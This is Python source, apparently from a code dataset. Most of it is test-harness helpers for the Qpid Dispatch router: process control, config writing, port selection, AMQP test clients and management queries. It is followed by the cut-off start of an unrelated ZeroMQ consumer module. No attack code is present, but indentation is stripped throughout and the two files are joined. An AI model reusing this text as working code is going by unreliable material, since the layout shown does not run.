if self.expect is not None and self.expect != Process.RUNNING:
error("still running")
self.expect = 0 # Expect clean exit after terminate
status = self.wait()
if self.expect is not None and self.expect != status:
error("exit code %s, expected %s" % (status, self.expect))
def wait(self, timeout=None):
"""
Add support for a timeout when using Python 2
"""
if timeout is None:
return super(Process, self).wait()
if is_python2:
start = time.time()
while True:
rc = super(Process, self).poll()
if rc is not None:
return rc
if time.time() - start >= timeout:
raise Exception("Process did not terminate")
time.sleep(0.1)
else:
return super(Process, self).wait(timeout=timeout)
def communicate(self, input=None, timeout=None):
"""
Add support for a timeout when using Python 2
"""
if timeout is None:
return super(Process, self).communicate(input=input)
if is_python2:
self.wait(timeout=timeout)
return super(Process, self).communicate(input=input)
return super(Process, self).communicate(input=input,
timeout=timeout)
class Config(object):
"""Base class for configuration objects that provide a convenient
way to create content for configuration files."""
def write(self, name, suffix=".conf"):
"""Write the config object to file name.suffix. Returns name.suffix."""
name = name + suffix
with open(name, 'w') as f:
f.write(str(self))
return name
class HttpServer(Process):
def __init__(self, args, name=None, expect=Process.RUNNING):
super(HttpServer, self).__init__(args, name=name, expect=expect)
# A HTTP2 Server that will respond to requests made via the router
class Http2Server(HttpServer):
def __init__(self, name=None, listen_port=None, wait=True,
py_string='python3', perform_teardown=True, cl_args=None,
server_file=None,
expect=Process.RUNNING):
self.name = name
self.listen_port = listen_port
self.ports_family = {self.listen_port: 'IPv4'}
self.py_string = py_string
self.cl_args = cl_args
self.perform_teardown = perform_teardown
self.server_file = server_file
self._wait_ready = False
self.args = ['/usr/bin/env', self.py_string, os.path.join(os.path.dirname(os.path.abspath(__file__)), self.server_file)]
if self.cl_args:
self.args += self.cl_args
super(Http2Server, self).__init__(self.args, name=name, expect=expect)
if wait:
self.wait_ready()
def wait_ready(self, **retry_kwargs):
"""
Wait for ports to be ready
"""
if not self._wait_ready:
self._wait_ready = True
self.wait_ports(**retry_kwargs)
def wait_ports(self, **retry_kwargs):
wait_ports(self.ports_family, **retry_kwargs)
class Qdrouterd(Process):
"""Run a Qpid Dispatch Router Daemon"""
class Config(list, Config):
"""
A router configuration.
The Config class is a list of tuples in the following format:
[ ('section-name', {attribute-map}), ...]
where attribute-map is a dictionary of key+value pairs. Key is an
attribute name (string), value can be any of [scalar | string | dict]
When written to a configuration file to be loaded by the router:
        o) there is no ':' between the section-name and the opening brace
o) attribute keys are separated by a ":" from their values
o) attribute values that are scalar or string follow the ":" on the
same line.
o) attribute values do not have trailing commas
o) The section-name and attribute keywords are written
without enclosing quotes
o) string type attribute values are not enclosed in quotes
o) attribute values of type dict are written in their JSON representation.
Fills in some default values automatically, see Qdrouterd.DEFAULTS
"""
DEFAULTS = {
'listener': {'host': '0.0.0.0', 'saslMechanisms': 'ANONYMOUS', 'idleTimeoutSeconds': '120',
'authenticatePeer': 'no', 'role': 'normal'},
'connector': {'host': '127.0.0.1', 'saslMechanisms': 'ANONYMOUS', 'idleTimeoutSeconds': '120'},
'router': {'mode': 'standalone', 'id': 'QDR'}
}
def sections(self, name):
"""Return list of sections named name"""
return [p for n, p in self if n == name]
@property
def router_id(self): return self.sections("router")[0]["id"]
def defaults(self):
"""Fill in default values in gconfiguration"""
for name, props in self:
if name in Qdrouterd.Config.DEFAULTS:
for n, p in dict_iteritems(Qdrouterd.Config.DEFAULTS[name]):
props.setdefault(n, p)
def __str__(self):
"""Generate config file content. Calls default() first."""
def tabs(level):
if level:
return " " * level
return ""
def value(item, level):
if isinstance(item, dict):
result = "{\n"
result += "".join(["%s%s: %s,\n" % (tabs(level + 1),
json.dumps(k),
json.dumps(v))
for k, v in item.items()])
result += "%s}" % tabs(level)
return result
return "%s" % item
def attributes(e, level):
assert(isinstance(e, dict))
# k = attribute name
# v = string | scalar | dict
return "".join(["%s%s: %s\n" % (tabs(level),
k,
value(v, level + 1))
for k, v in dict_iteritems(e)])
self.defaults()
# top level list of tuples ('section-name', dict)
return "".join(["%s {\n%s}\n" % (n, attributes(p, 1)) for n, p in self])
def __init__(self, name=None, config=Config(), pyinclude=None, wait=True,
perform_teardown=True, cl_args=None, expect=Process.RUNNING):
"""
        @param name: name used for output files, default to id from config.
@param config: router configuration
@keyword wait: wait for router to be ready (call self.wait_ready())
"""
cl_args = cl_args or []
self.config = copy(config)
self.perform_teardown = perform_teardown
if not name:
name = self.config.router_id
assert name
# setup log and debug dump files
self.dumpfile = os.path.abspath('%s-qddebug.txt' % name)
self.config.sections('router')[0]['debugDumpFile'] = self.dumpfile
default_log = [l for l in config if (l[0] == 'log' and l[1]['module'] == 'DEFAULT')]
if not default_log:
self.logfile = "%s.log" % name
config.append(
('log', {'module': 'DEFAULT', 'enable': 'trace+',
'includeSource': 'true', 'outputFile': self.logfile}))
else:
self.logfile = default_log[0][1].get('outputfile')
args = ['qdrouterd', '-c', config.write(name)] + cl_args
env_home = os.environ.get('QPID_DISPATCH_HOME')
if pyinclude:
args += ['-I', pyinclude]
elif env_home:
args += ['-I', os.path.join(env_home, 'python')]
args = os.environ.get('QPID_DISPATCH_RUNNER', '').split() + args
super(Qdrouterd, self).__init__(args, name=name, expect=expect)
self._management = None
self._wait_ready = False
if wait:
self.wait_ready()
@property
def management(self):
"""Return a management agent proxy for this router"""
if not self._management:
self._management = Node.connect(self.addresses[0], timeout=TIMEOUT)
return self._management
def teardown(self):
if self._management:
try:
self._management.close()
except:
pass
self._management = None
if not self.perform_teardown:
return
teardown_exc = None
try:
super(Qdrouterd, self).teardown()
except Exception as exc:
# re-raise _after_ dumping all the state we can
teardown_exc = exc
def check_output_file(filename, description):
"""check router's debug dump file for anything interesting (should be
empty) and dump it to stderr for perusal by organic lifeforms"""
try:
if os.stat(filename).st_size > 0:
with open(filename) as f:
sys.stderr.write("\nRouter %s %s:\n>>>>\n" %
(self.config.router_id, description))
sys.stderr.write(f.read())
sys.stderr.write("\n<<<<\n")
sys.stderr.flush()
except OSError:
# failed to open file. This can happen when an individual test
# spawns a temporary router (i.e. not created as part of the
# TestCase setUpClass method) that gets cleaned up by the test.
pass
check_output_file(filename=self.outfile + '.out', description="output file")
check_output_file(filename=self.dumpfile, description="debug dump file")
if teardown_exc:
# teardown failed - possible router crash?
# dump extra stuff (command line, output, log)
def tail_file(fname, line_count=50):
"""Tail a file to a list"""
out = []
with open(fname) as f:
line = f.readline()
while line:
out.append(line)
if len(out) > line_count:
out.pop(0)
line = f.readline()
return out
try:
for fname in [("output", self.outfile + '.out'),
("command", self.outfile + '.cmd')]:
with open(fname[1]) as f:
sys.stderr.write("\nRouter %s %s file:\n>>>>\n" %
(self.config.router_id, fname[0]))
sys.stderr.write(f.read())
sys.stderr.write("\n<<<<\n")
if self.logfile:
sys.stderr.write("\nRouter %s log file tail:\n>>>>\n" %
self.config.router_id)
tail = tail_file(os.path.join(self.outdir, self.logfile))
for ln in tail:
sys.stderr.write("%s" % ln)
sys.stderr.write("\n<<<<\n")
sys.stderr.flush()
except OSError:
# ignore file not found in case test never opens these
pass
raise teardown_exc
@property
def ports_family(self):
"""
Return a dict of listener ports and the respective port family
Example -
{ 23456: 'IPv4', 243455: 'IPv6' }
"""
ports_fam = {}
for l in self.config.sections('listener'):
if l.get('protocolFamily'):
ports_fam[l['port']] = l['protocolFamily']
else:
ports_fam[l['port']] = 'IPv4'
return ports_fam
@property
def ports(self):
"""Return list of configured ports for all listeners"""
return [l['port'] for l in self.config.sections('listener')]
def _cfg_2_host_port(self, c):
host = c['host']
port = c['port']
protocol_family = c.get('protocolFamily', 'IPv4')
if protocol_family == 'IPv6':
return "[%s]:%s" % (host, port)
elif protocol_family == 'IPv4':
return "%s:%s" % (host, port)
raise Exception("Unknown protocol family: %s" % protocol_family)
@property
def http_addresses(self):
"""Return http://host:port addresses for all http listeners"""
cfg = self.config.sections('httpListener')
return ["http://%s" % self._cfg_2_host_port(l) for l in cfg]
@property
def addresses(self):
"""Return amqp://host:port addresses for all listeners"""
cfg = self.config.sections('listener')
return ["amqp://%s" % self._cfg_2_host_port(l) for l in cfg]
@property
def connector_addresses(self):
"""Return list of amqp://host:port for all connectors"""
cfg = self.config.sections('connector')
return ["amqp://%s" % self._cfg_2_host_port(c) for c in cfg]
@property
def hostports(self):
"""Return host:port for all listeners"""
return [self._cfg_2_host_port(l) for l in self.config.sections('listener')]
def is_connected(self, port, host='127.0.0.1'):
"""If router has a connection to host:port:identity return the management info.
Otherwise return None"""
try:
ret_val = False
response = self.management.query(type="org.apache.qpid.dispatch.connection")
index_host = response.attribute_names.index('host')
for result in response.results:
outs = '%s:%s' % (host, port)
if result[index_host] == outs:
ret_val = True
return ret_val
except:
return False
def wait_address(self, address, subscribers=0, remotes=0, containers=0,
count=1, **retry_kwargs):
"""
Wait for an address to be visible on the router.
@keyword subscribers: Wait till subscriberCount >= subscribers
@keyword remotes: Wait till remoteCount >= remotes
        @keyword containers: Wait till containerCount >= containers
@keyword count: Wait until >= count matching addresses are found
@param retry_kwargs: keyword args for L{retry}
"""
def check():
# TODO aconway 2014-06-12: this should be a request by name, not a query.
# Need to rationalize addresses in management attributes.
# endswith check is because of M0/L/R prefixes
addrs = self.management.query(
type='org.apache.qpid.dispatch.router.address',
attribute_names=[u'name', u'subscriberCount', u'remoteCount', u'containerCount']).get_entities()
addrs = [a for a in addrs if a['name'].endswith(address)]
return (len(addrs) >= count
and addrs[0]['subscriberCount'] >= subscribers
and addrs[0]['remoteCount'] >= remotes
and addrs[0]['containerCount'] >= containers)
assert retry(check, **retry_kwargs)
def wait_address_unsubscribed(self, address, **retry_kwargs):
"""
Block until address has no subscribers
"""
a_type = 'org.apache.qpid.dispatch.router.address'
def check():
addrs = self.management.query(a_type).get_dicts()
rc = list(filter(lambda a: a['name'].find(address) != -1,
addrs))
count = 0
for a in rc:
count += a['subscriberCount']
count += a['remoteCount']
count += a['containerCount']
return count == 0
assert retry(check, **retry_kwargs)
def get_host(self, protocol_family):
if protocol_family == 'IPv4':
return '127.0.0.1'
elif protocol_family == 'IPv6':
return '::1'
else:
return '127.0.0.1'
def wait_ports(self, **retry_kwargs):
wait_ports(self.ports_family, **retry_kwargs)
def wait_connectors(self, **retry_kwargs):
"""
Wait for all connectors to be connected
@param retry_kwargs: keyword args for L{retry}
"""
for c in self.config.sections('connector'):
assert retry(lambda: self.is_connected(port=c['port'], host=self.get_host(c.get('protocolFamily'))),
**retry_kwargs), "Port not connected %s" % c['port']
def wait_ready(self, **retry_kwargs):
"""Wait for ports and connectors to be ready"""
if not self._wait_ready:
self._wait_ready = True
self.wait_ports(**retry_kwargs)
self.wait_connectors(**retry_kwargs)
return self
def is_router_connected(self, router_id, **retry_kwargs):
try:
self.management.read(identity="router.node/%s" % router_id)
# TODO aconway 2015-01-29: The above check should be enough, we
            # should not advertise a remote router in management till it is fully
# connected. However we still get a race where the router is not
# actually ready for traffic. Investigate.
# Meantime the following actually tests send-thru to the router.
node = Node.connect(self.addresses[0], router_id, timeout=1)
return retry_exception(lambda: node.query('org.apache.qpid.dispatch.router'))
except:
return False
def wait_router_connected(self, router_id, **retry_kwargs):
retry(lambda: self.is_router_connected(router_id), **retry_kwargs)
@property
def logfile_path(self):
return os.path.join(self.outdir, self.logfile)
class Tester(object):
"""Tools for use by TestCase
- Create a directory for the test.
- Utilities to create processes and servers, manage ports etc.
- Clean up processes on teardown"""
# Top level directory above any Tester directories.
# CMake-generated configuration may be found here.
top_dir = os.getcwd()
# The root directory for Tester directories, under top_dir
root_dir = os.path.abspath(__name__ + '.dir')
def __init__(self, id):
"""
@param id: module.class.method or False if no directory should be created
"""
self.directory = os.path.join(self.root_dir, *id.split('.')) if id else None
self.cleanup_list = []
def rmtree(self):
"""Remove old test class results directory"""
if self.directory:
shutil.rmtree(os.path.dirname(self.directory), ignore_errors=True)
def setup(self):
"""Called from test setup and class setup."""
if self.directory:
os.makedirs(self.directory)
os.chdir(self.directory)
def teardown(self):
"""Clean up (tear-down, stop or close) objects recorded via cleanup()"""
self.cleanup_list.reverse()
errors = []
for obj in self.cleanup_list:
try:
for method in ["teardown", "tearDown", "stop", "close"]:
cleanup = getattr(obj, method, None)
if cleanup:
cleanup()
break
except Exception as exc:
errors.append(exc)
if errors:
raise RuntimeError("Errors during teardown: \n\n%s" % "\n\n".join([str(e) for e in errors]))
def cleanup(self, x):
"""Record object x for clean-up during tear-down.
        x should have one of the methods teardown, tearDown, stop or close"""
self.cleanup_list.append(x)
return x
def popen(self, *args, **kwargs):
"""Start a Process that will be cleaned up on teardown"""
return self.cleanup(Process(*args, **kwargs))
def qdrouterd(self, *args, **kwargs):
"""Return a Qdrouterd that will be cleaned up on teardown"""
return self.cleanup(Qdrouterd(*args, **kwargs))
def http2server(self, *args, **kwargs):
return self.cleanup(Http2Server(*args, **kwargs))
port_range = (20000, 30000)
next_port = random.randint(port_range[0], port_range[1])
@classmethod
def get_port(cls, protocol_family='IPv4'):
"""Get an unused port"""
def advance():
"""Advance with wrap-around"""
cls.next_port += 1
if cls.next_port >= cls.port_range[1]:
cls.next_port = cls.port_range[0]
start = cls.next_port
while not port_available(cls.next_port, protocol_family):
advance()
if cls.next_port == start:
raise Exception("No available ports in range %s", cls.port_range)
p = cls.next_port
advance()
return p
class TestCase(unittest.TestCase, Tester): # pylint: disable=too-many-public-methods
"""A TestCase that sets up its own working directory and is also a Tester."""
def __init__(self, test_method):
unittest.TestCase.__init__(self, test_method)
Tester.__init__(self, self.id())
@classmethod
def setUpClass(cls):
cls.maxDiff = None
cls.tester = Tester('.'.join([cls.__module__, cls.__name__, 'setUpClass']))
cls.tester.rmtree()
cls.tester.setup()
@classmethod
def tearDownClass(cls):
if hasattr(cls, 'tester'):
cls.tester.teardown()
del cls.tester
def setUp(self):
Tester.setup(self)
def tearDown(self):
Tester.teardown(self)
def assert_fair(self, seq):
avg = sum(seq) / len(seq)
for i in seq:
assert i > avg / 2, "Work not fairly distributed: %s" % seq
if not hasattr(unittest.TestCase, 'assertRegex'):
def assertRegex(self, text, regexp, msg=None):
assert re.search(regexp, text), msg or "Can't find %r in '%s'" % (regexp, text)
if not hasattr(unittest.TestCase, 'assertNotRegex'):
def assertNotRegex(self, text, regexp, msg=None):
assert not re.search(regexp, text), msg or "Found %r in '%s'" % (regexp, text)
class SkipIfNeeded(object):
"""
    Decorator class that can be used along with test methods
    to provide skip-test behavior when running on Python 2.6
    or any later version.
    This decorator can be used on test methods; a boolean
    condition must be provided (the skip parameter) to define whether
    or not the test will be skipped.
"""
def __init__(self, skip, reason):
"""
        :param skip: if True the method won't be called
:param reason: reason why test was skipped
"""
self.skip = skip
self.reason = reason
def __call__(self, f):
@functools.wraps(f)
def wrap(*args, **kwargs):
"""
Wraps original test method's invocation and dictates whether or
not the test will be executed based on value (boolean) of the
skip parameter.
            When running tests with Python < 2.7, if the "skip" parameter is
            true the original method won't be called. When running Python >= 2.7,
            skipTest will be called with the given "reason"; otherwise the
            original method will be invoked.
:param args:
:return:
"""
instance = args[0]
if self.skip:
instance.skipTest(self.reason)
return f(*args, **kwargs)
return wrap
def main_module():
"""
Return the module name of the __main__ module - i.e. the filename with the
path and .py extension stripped. Useful to run the tests in the current file but
using the proper module prefix instead of '__main__', as follows:
if __name__ == '__main__':
unittest.main(module=main_module())
"""
return os.path.splitext(os.path.basename(__main__.__file__))[0]
class AsyncTestReceiver(MessagingHandler):
"""
A simple receiver that runs in the background and queues any received
messages. Messages can be retrieved from this thread via the queue member.
:param wait: block the constructor until the link has been fully
established.
:param recover_link: restart on remote link detach
"""
Empty = Queue.Empty
def __init__(self, address, source, conn_args=None, container_id=None,
wait=True, recover_link=False, msg_args=None):
if msg_args is None:
msg_args = {}
super(AsyncTestReceiver, self).__init__(**msg_args)
self.address = address
self.source = source
self.conn_args = conn_args
self.queue = Queue.Queue()
self._conn = None
self._container = Container(self)
cid = container_id or "ATR-%s:%s" % (source, uuid.uuid4())
self._container.container_id = cid
self._ready = Event()
self._recover_link = recover_link
self._recover_count = 0
self._stop_thread = False
self._thread = Thread(target=self._main)
self._thread.daemon = True
self._thread.start()
if wait and self._ready.wait(timeout=TIMEOUT) is False:
raise Exception("Timed out waiting for receiver start")
def _main(self):
self._container.timeout = 0.5
self._container.start()
while self._container.process():
if self._stop_thread:
if self._conn:
self._conn.close()
self._conn = None
def stop(self, timeout=TIMEOUT):
self._stop_thread = True
self._container.wakeup()
self._thread.join(timeout=TIMEOUT)
if self._thread.is_alive():
raise Exception("AsyncTestReceiver did not exit")
del self._conn
del self._container
def on_start(self, event):
kwargs = {'url': self.address}
if self.conn_args:
kwargs.update(self.conn_args)
self._conn = event.container.connect(**kwargs)
def on_connection_opened(self, event):
kwargs = {'source': self.source}
rcv = event.container.create_receiver(event.connection,
**kwargs)
def on_link_opened(self, event):
self._ready.set()
def on_link_closing(self, event):
event.link.close()
if self._recover_link and not self._stop_thread:
# lesson learned: the generated link name will be the same as the
# old link (which is bad) so we specify a new one
self._recover_count += 1
kwargs = {'source': self.source,
'name': "%s:%s" % (event.link.name, self._recover_count)}
rcv = event.container.create_receiver(event.connection,
**kwargs)
def on_message(self, event):
self.queue.put(event.message)
def on_disconnected(self, event):
# if remote terminates the connection kill the thread else it will spin
# on the cpu
if self._conn:
self._conn.close()
self._conn = None
class AsyncTestSender(MessagingHandler):
"""
A simple sender that runs in the background and sends 'count' messages to a
given target.
"""
class TestSenderException(Exception):
def __init__(self, error=None):
super(AsyncTestSender.TestSenderException, self).__init__(error)
def __init__(self, address, target, count=1, message=None,
container_id=None, presettle=False):
super(AsyncTestSender, self).__init__(auto_accept=False,
auto_settle=False)
self.address = address
self.target = target
self.total = count
self.presettle = presettle
self.accepted = 0
self.released = 0
self.modified = 0
self.rejected = 0
self.sent = 0
self.error = None
self.link_stats = None
self._conn = None
self._sender = None
self._message = message or Message(body="test")
self._container = Container(self)
cid = container_id or "ATS-%s:%s" % (target, uuid.uuid4())
self._container.container_id = cid
self._link_name = "%s-%s" % (cid, "tx")
self._thread = Thread(target=self._main)
self._thread.daemon = True
self._thread.start()
def _main(self):
self._container.timeout = 0.5
self._container.start()
while self._container.process():
self._check_if_done()
def wait(self):
# don't stop it - wait until everything is sent
self._thread.join(timeout=TIMEOUT)
assert not self._thread.is_alive(), "sender did not complete"
if self.error:
raise AsyncTestSender.TestSenderException(self.error)
del self._sender
del self._conn
del self._container
def on_start(self, event):
self._conn = self._container.connect(self.address)
def on_connection_opened(self, event):
option = AtMostOnce if self.presettle else AtLeastOnce
self._sender = self._container.create_sender(self._conn,
target=self.target,
options=option(),
name=self._link_name)
def on_sendable(self, event):
if self.sent < self.total:
self._sender.send(self._message)
self.sent += 1
def _check_if_done(self):
done = (self.sent == self.total
and (self.presettle
or (self.accepted + self.released + self.modified
+ self.rejected == self.sent)))
if done and self._conn:
self.link_stats = get_link_info(self._link_name,
self.address)
self._conn.close()
self._conn = None
def on_accepted(self, event):
self.accepted += 1
event.delivery.settle()
def on_released(self, event):
# for some reason Proton 'helpfully' calls on_released even though the
# delivery state is actually MODIFIED
if event.delivery.remote_state == Delivery.MODIFIED:
return self.on_modified(event)
self.released += 1
event.delivery.settle()
def on_modified(self, event):
self.modified += 1
event.delivery.settle()
def on_rejected(self, event):
self.rejected += 1
event.delivery.settle()
def on_link_error(self, event):
self.error = "link error:%s" % str(event.link.remote_condition)
if self._conn:
self._conn.close()
self._conn = None
def on_disconnected(self, event):
# if remote terminates the connection kill the thread else it will spin
# on the cpu
self.error = "connection to remote dropped"
if self._conn:
self._conn.close()
self._conn = None
class QdManager(object):
"""
A means to invoke qdmanage during a testcase
"""
def __init__(self, tester=None, address=None, timeout=TIMEOUT,
router_id=None,
edge_router_id=None):
# 'tester' - can be 'self' when called in a test,
# or an instance any class derived from Process (like Qdrouterd)
self._tester = tester or Tester(None)
self._timeout = timeout
self._address = address
self.router_id = router_id
self.edge_router_id = edge_router_id
self.router = []
if self.router_id:
self.router = self.router + ['--router', self.router_id]
elif self.edge_router_id:
self.router = self.router + ['--edge-router', self.edge_router_id]
def __call__(self, cmd, address=None, input=None, expect=Process.EXIT_OK,
timeout=None):
assert address or self._address, "address missing"
p = self._tester.popen(
['qdmanage'] + cmd.split(' ')
+ self.router + ['--bus', address or self._address,
'--indent=-1',
'--timeout', str(timeout or self._timeout)],
stdin=PIPE, stdout=PIPE, stderr=STDOUT, expect=expect,
universal_newlines=True)
out = p.communicate(input)[0]
try:
p.teardown()
except Exception as e:
raise Exception("%s\n%s" % (e, out))
return out
def create(self, long_type, kwargs):
cmd = "CREATE --type=%s" % long_type
for k, v in kwargs.items():
cmd += " %s=%s" % (k, v)
return json.loads(self(cmd))
def update(self, long_type, kwargs, name=None, identity=None):
cmd = 'UPDATE --type=%s' % long_type
if identity is not None:
cmd += " --identity=%s" % identity
elif name is not None:
cmd += " --name=%s" % name
for k, v in kwargs.items():
cmd += " %s=%s" % (k, v)
return json.loads(self(cmd))
def delete(self, long_type, name=None, identity=None):
cmd = 'DELETE --type=%s' % long_type
if identity is not None:
cmd += " --identity=%s" % identity
elif name is not None:
cmd += " --name=%s" % name
else:
assert False, "name or identity not supplied!"
self(cmd)
def query(self, long_type):
return json.loads(self('QUERY --type=%s' % long_type))
def get_log(self, limit=None):
cmd = 'GET-LOG'
if (limit):
cmd += " limit=%s" % limit
return json.loads(self(cmd))
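# Illustrative sketch (assumption): QdManager wraps the qdmanage CLI, so a typical
# call site queries an entity type and inspects the returned list of dicts, much
# like get_link_info() further below in this module.
def _example_count_connections(address):
    """Return the number of connections reported by the router at 'address'."""
    qdm = QdManager(address=address)
    return len(qdm.query('org.apache.qpid.dispatch.connection'))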
class MgmtMsgProxy(object):
"""
Utility for creating and inspecting management messages
"""
class _Response(object):
def __init__(self, status_code, status_description, body):
self.status_code = status_code
self.status_description = status_description
if body.__class__ == dict and len(body.keys()) == 2 and 'attributeNames' in body.keys() and 'results' in body.keys():
results = []
names = body['attributeNames']
for result in body['results']:
result_map = {}
for i in range(len(names)):
result_map[names[i]] = result[i]
results.append(MgmtMsgProxy._Response(status_code, status_description, result_map))
self.attrs = {'results': results}
else:
self.attrs = body
def __getattr__(self, key):
return self.attrs[key]
def __init__(self, reply_addr):
self.reply_addr = reply_addr
def response(self, msg):
ap = msg.properties
return self._Response(ap['statusCode'], ap['statusDescription'], msg.body)
def query_router(self):
ap = {'operation': 'QUERY', 'type': 'org.apache.qpid.dispatch.router'}
return Message(properties=ap, reply_to=self.reply_addr)
def query_connections(self):
ap = {'operation': 'QUERY', 'type': 'org.apache.qpid.dispatch.connection'}
return Message(properties=ap, reply_to=self.reply_addr)
def query_links(self):
ap = {'operation': 'QUERY', 'type': 'org.apache.qpid.dispatch.router.link'}
return Message(properties=ap, reply_to=self.reply_addr)
def query_link_routes(self):
ap = {'operation': 'QUERY',
'type': 'org.apache.qpid.dispatch.router.config.linkRoute'}
return Message(properties=ap, reply_to=self.reply_addr)
def query_addresses(self):
ap = {'operation': 'QUERY',
'type': 'org.apache.qpid.dispatch.router.address'}
return Message(properties=ap, reply_to=self.reply_addr)
def create_link_route(self, name, kwargs):
ap = {'operation': 'CREATE',
'type': 'org.apache.qpid.dispatch.router.config.linkRoute',
'name': name}
return Message(properties=ap, reply_to=self.reply_addr,
body=kwargs)
def delete_link_route(self, name):
ap = {'operation': 'DELETE',
'type': 'org.apache.qpid.dispatch.router.config.linkRoute',
'name': name}
return Message(properties=ap, reply_to=self.reply_addr)
def create_connector(self, name, **kwargs):
ap = {'operation': 'CREATE',
'type': 'org.apache.qpid.dispatch.connector',
'name': name}
return Message(properties=ap, reply_to=self.reply_addr,
body=kwargs)
def delete_connector(self, name):
ap = {'operation': 'DELETE',
'type': 'org.apache.qpid.dispatch.connector',
'name': name}
return Message(properties=ap, reply_to=self.reply_addr)
def query_conn_link_routes(self):
ap = {'operation': 'QUERY',
'type': 'org.apache.qpid.dispatch.router.connection.linkRoute'}
return Message(properties=ap, reply_to=self.reply_addr)
def create_conn_link_route(self, name, kwargs):
ap = {'operation': 'CREATE',
'type': 'org.apache.qpid.dispatch.router.connection.linkRoute',
'name': name}
return Message(properties=ap, reply_to=self.reply_addr,
body=kwargs)
def delete_conn_link_route(self, name):
ap = {'operation': 'DELETE',
'type': 'org.apache.qpid.dispatch.router.connection.linkRoute',
'name': name}
return Message(properties=ap, reply_to=self.reply_addr)
def read_conn_link_route(self, name):
ap = {'operation': 'READ',
'type': 'org.apache.qpid.dispatch.router.connection.linkRoute',
'name': name}
return Message(properties=ap, reply_to=self.reply_addr)
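# Illustrative sketch: MgmtMsgProxy only builds plain proton Messages; a test sends
# the returned message over its own sender link and feeds the reply to response().
# The reply address below is a hypothetical example value.
def _example_build_router_query(reply_addr="example.reply.address"):
    proxy = MgmtMsgProxy(reply_addr)
    return proxy.query_router()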
class TestTimeout(object):
"""
A callback object for MessagingHandler class
parent: A MessagingHandler with a timeout() method
"""
def __init__(self, parent):
self.parent = parent
def on_timer_task(self, event):
self.parent.timeout()
class PollTimeout(object):
"""
A callback object for MessagingHandler scheduled timers
parent: A MessagingHandler with a poll_timeout() method
"""
def __init__(self, parent):
self.parent = parent
def on_timer_task(self, event):
self.parent.poll_timeout()
def get_link_info(name, address):
"""
Query the router at address for the status and statistics of the named link
"""
qdm = QdManager(address=address)
rc = qdm.query('org.apache.qpid.dispatch.router.link')
for item in rc:
if item.get('name') == name:
return item
return None
def has_mobile_dest_in_address_table(address, dest):
qdm = QdManager(address=address)
rc = qdm.query('org.apache.qpid.dispatch.router.address')
has_dest = False
for item in rc:
if dest in item.get("name"):
has_dest = True
break
return has_dest
def get_inter_router_links(address):
"""
Return a list of all links with type="inter-router
:param address:
"""
inter_router_links = []
qdm = QdManager(address=address)
rc = qdm.query('org.apache.qpid.dispatch.router.link')
for item in rc:
if item.get("linkType") == "inter-router":
inter_router_links.append(item)
return inter_router_links
class Timestamp(object):
"""
Time stamps for logging.
"""
def __init__(self):
self.ts = datetime.now()
def __str__(self):
return self.ts.strftime("%Y-%m-%d %H:%M:%S.%f")
class Logger(object):
"""
Record an event log for a self test.
May print per-event or save events to be printed later.
Optional file opened in 'append' mode to which each log line is written.
"""
def __init__(self,
title="Logger",
print_to_console=False,
save_for_dump=True,
ofilename=None):
self.title = title
self.print_to_console = print_to_console
self.save_for_dump = save_for_dump
self.logs = []
self.ofilename = ofilename
def log(self, msg):
ts = Timestamp()
if self.save_for_dump:
self.logs.append((ts, msg))
if self.print_to_console:
print("%s %s" % (ts, msg))
sys.stdout.flush()
if self.ofilename is not None:
with open(self.ofilename, 'a') as f_out:
f_out.write("%s %s\n" % (ts, msg))
f_out.flush()
def dump(self):
print(self)
sys.stdout.flush()
def __str__(self):
lines = [self.title]
for ts, msg in self.logs:
lines.append("%s %s" % (ts, msg))
res = str('\n'.join(lines))
return res
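# Illustrative sketch: a Logger that prints each event as it happens and also keeps
# the events for a final dump; the title below is a hypothetical example value.
def _example_logger_usage():
    log = Logger(title="example-test", print_to_console=True)
    log.log("router started")
    log.log("client connected")
    log.dump()  # prints the title followed by all time-stamped events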
|
zeromq_consumer.py
|
# -*- coding: utf-8 -*-
# @Author : ydf
import os
import socket
import json
# import time
import zmq
import multiprocessing
from function_scheduling_distributed_framework.constant import BrokerEnum, ConcurrentModeEnum
from function_scheduling_distributed_framework.consumers.base_consumer import AbstractConsumer
from nb_log import get_logger
# noinspection PyPep8
def check_port_is_used(ip, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# noinspection PyPep8,PyBroadException
try:
s.connect((ip, int(port)))
s.shutdown(2)
        # shutdown() turns the socket's bidirectional transfer into one-way transfer.
        # It takes a single argument describing how to close the socket:
        # 0 disables further reads, 1 disables further writes, 2 disables both.
return True
except Exception:
return False
logger_zeromq_broker = get_logger('zeromq_broker')
# noinspection PyUnresolvedReferences
def start_broker(port_router: int, port_dealer: int):
try:
context = zmq.Context()
# noinspection PyUnresolvedReferences
frontend = context.socket(zmq.ROUTER)
backend = context.socket(zmq.DEALER)
frontend.bind(f"tcp://*:{port_router}")
backend.bind(f"tcp://*:{port_dealer}")
# Initialize poll set
poller = zmq.Poller()
poller.register(frontend, zmq.POLLIN)
poller.register(backend, zmq.POLLIN)
        logger_zeromq_broker.info(f'broker bound ports {port_router} and {port_dealer} successfully')
# Switch messages between sockets
# noinspection DuplicatedCode
while True:
            socks = dict(poller.poll())  # poll loop: receive on whichever socket is ready
if socks.get(frontend) == zmq.POLLIN:
message = frontend.recv_multipart()
backend.send_multipart(message)
if socks.get(backend) == zmq.POLLIN:
message = backend.recv_multipart()
frontend.send_multipart(message)
except Exception as e:
logger_zeromq_broker.warning(e)
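# Illustrative sketch (assumption, not part of this module): the publishing side of
# this broker is a plain REQ socket that connects to the ROUTER port and sends the
# task body as JSON, mirroring the REP consumer in _shedual_task below.
def example_publish(port_router: int, body: dict):
    context = zmq.Context()
    # noinspection PyUnresolvedReferences
    zsocket = context.socket(zmq.REQ)
    zsocket.connect(f"tcp://localhost:{port_router}")
    zsocket.send(json.dumps(body).encode())
    return zsocket.recv()  # the consumer replies with b'recv ok'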
class ZeroMqConsumer(AbstractConsumer):
"""
    Consumer for the zeromq broker. zeromq is plain socket-based code: messages are not persisted and no extra broker software needs to be installed.
"""
BROKER_KIND = BrokerEnum.ZERO_MQ
def start_broker_queue_name_as_port(self):
# threading.Thread(target=self._start_broker).start()
# noinspection PyBroadException
try:
if not (10000 < int(self._queue_name) < 65535):
raise ValueError(",请设置queue的名字是一个 10000到65535的之间的一个端口数字")
except Exception:
self.logger.critical(f" zeromq 模式以 queue 的民资作为tcp 端口,请设置queue的名字是一个 10000 到 65535 之间的一个端口数字")
# noinspection PyProtectedMember
os._exit(444)
if check_port_is_used('127.0.0.1', int(self._queue_name)):
self.logger.debug(f"""{int(self._queue_name)} router端口已经启动(或占用) """)
